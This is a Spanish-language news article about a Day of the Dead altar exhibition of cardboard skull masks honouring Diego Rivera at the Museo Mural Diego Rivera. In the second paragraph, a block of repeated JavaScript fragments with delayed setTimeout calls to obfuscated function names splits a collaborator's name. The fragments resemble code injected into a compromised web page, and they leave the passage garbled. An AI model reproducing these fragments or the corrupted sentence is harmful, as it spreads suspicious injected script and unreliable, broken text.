Recuerdan a Diego Rivera con altar de muertos a 60 años de su muerte

México. Cerca de 50 mascaras en forma de calavera elaboradas de cartón corrugado y cartulina blanca, acompañadas al centro por una escultura con el rostro de Diego Rivera hecha con poliuretano y fibra de vidrio, integran la exposición “Tzompantli-La Ofrenda”, inaugurada esta noche en el Museo Mural Diego Rivera, en el el primer cuadro de esta ciudad.

Con la colaboración de Ferdinandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o Hernández y la productora Pintle Morachel, con esta exposición en forma de altar el recinto situado puso en marcha su programación para celebrar del Día de Muertos.

“Tzompnatli es este muro de cráneos que más que una advertencia es un recordatorio, un enaltecer a los caídos en batalla y que de manera sincrética lo sumamos al altar de Día de Muertos y nos recuerda a quienes se han ido.

“Por ser el 60 aniversario luctuoso de Diego Rivera, planteamos la posibilidad de hacer una muestra neutra, una instalación con colores ocre y blanco, que representan tierra y huesos”, explicó Hernández a Notimex.

Agregó que se trata de una instalación interactiva, en donde la gente que visite el museo y participe en los talleres, podrá colocar en este altar sus creaciones, a fin de hacerla y se convierta en algo colaborativo.

La muestra recuerda el gusto del muralista, incentivador de tradiciones, propagador de las figurillas y el arte prehispánico, lo cual le llevó a coleccionar un gran número de objetos y que hoy forman parte del patrimonio heredado por él al pueblo de México.

Dicha exposición, que estará abierta hasta el 15 de noviembre, se presenta en forma de altar, mientras que el rostro de Rivera luce al centro, acompañado de las mascaras mencionadas colocadas en la pared, haciendo honor a un Tzompantli o muro de cráneos.

Minutos después de la inauguración, el Coro Infantil Ridi ofreció el recital “De vivos para muertos”, en el que interpretaron canciones como “La Llorona”, “Vasija de barro”, “No es serio este cementero”, “Aire”, “La Paloma”, “La Martiniana”, “El Fantasma” y “La Bruja”.

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Back to top button
Close